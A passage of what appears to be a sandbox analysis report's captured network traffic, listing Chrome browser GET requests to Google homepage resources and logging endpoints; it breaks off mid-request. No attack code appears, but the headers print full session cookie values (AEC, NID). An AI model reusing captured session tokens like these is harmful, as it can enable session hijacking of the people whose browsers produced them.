Source: global traffic	HTTP traffic detected: GET /xjs/_/js/md=10/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw HTTP/1.1Host: www.google.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.uXKqy-U68Tg.L.B1.O/am=AEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA/d=0/br=1/rs=ACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng/m=syj3,syka?xjs=s4 HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=0/dg=0/br=1/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw/m=sytl,sytk,VsqSCc,sy1b6,P10Owf,sy19v,sy19t,syq9,gSZvdb,syw5,syw4,WlNQGd,sywi,sywg,nabPbb,syqe,syqb,syqa,syq8,DPreE,syvz,syvx,syj3,syka,CnSW2d,kQvlef,sywh,fXO0xe?xjs=s4 HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /client_204?cs=1&opi=89978449 HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /async/hpba?vet=10ahUKEwiy08nU942HAxWvRPEDHRObCtMQj-0KCBY..i&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&opi=89978449&yv=3&cs=0&async=isImageHp:false,eventId:J9-GZvKjJq-Jxc8Pk7aqmA0,endpoint:overlay,stick:,_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.O0yDbPOOl4Q.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.uXKqy-U68Tg.L.B1.O%2Fam%3DAEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA%2Fbr%3D1%2Frs%3DACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.O0yDbPOOl4Q.O%2Fck%3Dxjs.hd.uXKqy-U68Tg.L.B1.O%2Fam%3DAEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAABACqCfBDAUADYEAAAAIABAAIAAIQBAKAAAAuAEEAEFAJAAEIBQEIBHmQCAEEAmQAAIUASQACgIcgABAAARAAOGARAVAAwBAAAAAQQAAAAM4MYAAgQAgBAAAXgAAQAE6AABMAAKIEBQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oHrqdFD_oFp_AmAyXzeY67GUHO6TQ,_fmt:prog,_id:a3JU5b HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=515=S8iHhv07raf41epFxmKcnZq-hA3IiHf71KOMCXIODJtroBeNJXcAXcqaQiVJGLCP4yA3EuRsL1pp_8DfTgCYW5PFkh3vaRuOgrmUXpC53SdhPCcW-0XXuPifw_rc_nur1Tknbw4dSAwY5Ms_51lN3JuCjOlzI4duSVw6dwnCqvI
Source: global traffic	HTTP traffic detected: GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=515=S8iHhv07raf41epFxmKcnZq-hA3IiHf71KOMCXIODJtroBeNJXcAXcqaQiVJGLCP4yA3EuRsL1pp_8DfTgCYW5PFkh3vaRuOgrmUXpC53SdhPCcW-0XXuPifw_rc_nur1Tknbw4dSAwY5Ms_51lN3JuCjOlzI4duSVw6dwnCqvI
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.uXKqy-U68Tg.L.B1.O/am=AEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA/d=0/br=1/rs=ACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng/m=syj3,syka?xjs=s4 HTTP/1.1Host: www.google.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=0/dg=0/br=1/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw/m=syf6,aLUfP?xjs=s4 HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; OGPC=19037049-1:; NID=515=RTiVvdTA6ylkpQiO3Qeuu_aZDZp-W5AlG1VKBx0MgrcTLzo16l9hXh_WK6lnqgb6BKkShYlj0PI7fRd5QcYY_5ZnQ8V1elcZw8AJfid5Lix8wFh3hvAVpG5jX2dVMz6S3OckHTC9kNXXFZyVd6jv69Bm80go6kWRSoPEMU3kNSUezEV3Gnpwnzw
Source: global traffic	HTTP traffic detected: GET /async/hpba?vet=10ahUKEwiy08nU942HAxWvRPEDHRObCtMQj-0KCBY..i&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&opi=89978449&yv=3&cs=0&async=isImageHp:false,eventId:J9-GZvKjJq-Jxc8Pk7aqmA0,endpoint:overlay,stick:,_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.O0yDbPOOl4Q.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.uXKqy-U68Tg.L.B1.O%2Fam%3DAEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA%2Fbr%3D1%2Frs%3DACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.O0yDbPOOl4Q.O%2Fck%3Dxjs.hd.uXKqy-U68Tg.L.B1.O%2Fam%3DAEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAABACqCfBDAUADYEAAAAIABAAIAAIQBAKAAAAuAEEAEFAJAAEIBQEIBHmQCAEEAmQAAIUASQACgIcgABAAARAAOGARAVAAwBAAAAAQQAAAAM4MYAAgQAgBAAAXgAAQAE6AABMAAKIEBQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oHrqdFD_oFp_AmAyXzeY67GUHO6TQ,_fmt:prog,_id:a3JU5b HTTP/1.1Host: www.google.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; OGPC=19037049-1:; NID=515=RTiVvdTA6ylkpQiO3Qeuu_aZDZp-W5AlG1VKBx0MgrcTLzo16l9hXh_WK6lnqgb6BKkShYlj0PI7fRd5QcYY_5ZnQ8V1elcZw8AJfid5Lix8wFh3hvAVpG5jX2dVMz6S3OckHTC9kNXXFZyVd6jv69Bm80go6kWRSoPEMU3kNSUezEV3Gnpwnzw
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=0/dg=0/br=1/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw/m=kMFpHd,sy8x,bm51tf?xjs=s4 HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; OGPC=19037049-1:; NID=515=RTiVvdTA6ylkpQiO3Qeuu_aZDZp-W5AlG1VKBx0MgrcTLzo16l9hXh_WK6lnqgb6BKkShYlj0PI7fRd5QcYY_5ZnQ8V1elcZw8AJfid5Lix8wFh3hvAVpG5jX2dVMz6S3OckHTC9kNXXFZyVd6jv69Bm80go6kWRSoPEMU3kNSUezEV3Gnpwnzw
Source: global traffic	HTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=515=DzgbIPWyjnteM7p2krd7CtooCsJpNrTKFAtf2c6YEuXPBiEhnUMORnckAkkoX1SW8Rv7LYNZOWaiVlMIp7AeVx8FMuYWkYyAwAWU8gb-SnH6tWdD5TlWl9FfA2uTmJKZBdo1tLkotn0Mg3BEx3GmYhbBl7agl3kuflwtZfLHHDA
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; OGPC=19037049-1:; NID=515=RTiVvdTA6ylkpQiO3Qeuu_aZDZp-W5AlG1VKBx0MgrcTLzo16l9hXh_WK6lnqgb6BKkShYlj0PI7fRd5QcYY_5ZnQ8V1elcZw8AJfid5Lix8wFh3hvAVpG5jX2dVMz6S3OckHTC9kNXXFZyVd6jv69Bm80go6kWRSoPEMU3kNSUezEV3Gnpwnzw
Source: global traffic	HTTP traffic detected: GET /gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&zx=1720114990613&opi=89978449 HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: 